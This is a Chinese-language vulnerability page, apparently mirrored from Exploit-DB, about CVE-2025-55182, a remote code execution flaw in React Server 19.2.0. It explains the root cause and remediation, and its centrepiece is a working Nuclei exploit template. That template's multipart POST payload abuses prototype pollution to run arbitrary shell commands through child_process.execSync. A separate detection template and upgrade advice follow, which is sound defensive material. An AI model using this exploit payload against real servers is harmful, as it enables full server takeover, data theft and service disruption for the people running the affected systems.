[webapps] React Server 19.2.0 - Remote Code Execution
CVE-2025-55182
React Server 19.2.0 中服务器端渲染机制因不当反序列化导致远程代码执行。
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2025-55182 |
|---|---|
| 漏洞类型 | 反序列化RCE |
| 受影响版本 | React Server all versions prior to 19.2.1 |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2026-04-09 |
| 提交者 | [EynaExp] (https://github.com/EynaExp) |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
在 server rendering 过程中,当处理包含特定嵌套序列化结构的 JSON 对象时,React Server 错误地对该结构进行执行而非简单数据解析,从而允许攻击者注入并执行任意 JavaScript 代码。具体问题位于内部 render 方法的序列化还原逻辑中,未对用户输入做安全限制便直接使用 Function 构造函数或 eval 进行活代码运行。
🎯 攻击场景
1. 攻击者定位到接受 React Server 渲染请求的接口;2. 构造特制的 JSON 负载,其中包含利用嵌套序列化结构触发代码执行的 payload;3. 将该负载作为渲染参数发送;4. React Server 在处理请求时错误执行 payload 中的代码;5. 攻击者在服务器环境下获得远程命令执行能力。前置条件:服务端使用 React Server 19.2.0 以及以下版本,且存在公开或可到达的渲染端点。成功标志:通过命令执行在服务器上获得反弹 shell 或执行系统命令。
💥 漏洞影响
远程代码执行(RCE),攻击者可完全控制服务器,执行任意系统命令,导致数据泄露、权限提升、服务中断等全面危害。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2025-55182-exploit
info:
name: React Server 19.2.0 - Remote Code Execution
author: EynaExp
severity: critical
description: |
Exploits CVE-2025-55182 in React Server versions 19.0.0 through 19.2.0 to
achieve Remote Code Execution via prototype pollution and insecure
deserialization.
remediation: |
Upgrade React Server to a version later than 19.2.0.
tags: cve,cve2025,react,rce
variables:
cmd: "id"
http:
- raw:
- |
POST {{BaseURL}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('{{cmd}}');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
matchers:
- type: regex
part: body
regex:
- 'uid=\d+\([a-zA-Z0-9_]+\)'
- 'gid=\d+\([a-zA-Z0-9_]+\)'
- 'groups='
condition: or🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-55182-detection
info:
name: React Server 19.2.0 - Detection
author: EynaExp
severity: medium
description: |
Detects if the target is running React Server version 19.0.0 to 19.2.0, which
are vulnerable to CVE-2025-55182.
remediation: |
Upgrade React Server to a version later than 19.2.0.
tags: cve,cve2025,react,detection
http:
- method: GET
path:
- "{{BaseURL}}/__rsc"
- "{{BaseURL}}"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
words:
- "React Server"
- "rsc-server"
part: body
- type: regex
name: react-version
part: body
regex:
- 'React Server v?(\d+\.\d+\.\d+)'
- 'rsc-server/(\d+\.\d+\.\d+)'
condition: or
extractors:
- type: regex
name: version
part: body
group: 1
regex:
- 'React Server v?(\d+\.\d+\.\d+)'
- 'rsc-server/(\d+\.\d+\.\d+)'🛡️ 修复建议
立即升级至 React Server 19.2.1 或更高版本;作为临时缓解措施,将渲染端点置于严格访问控制(如 IP 白名单、认证)下,并禁用不可信的 JSON 输入处理。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 09:53 | 来源: Exploit-DB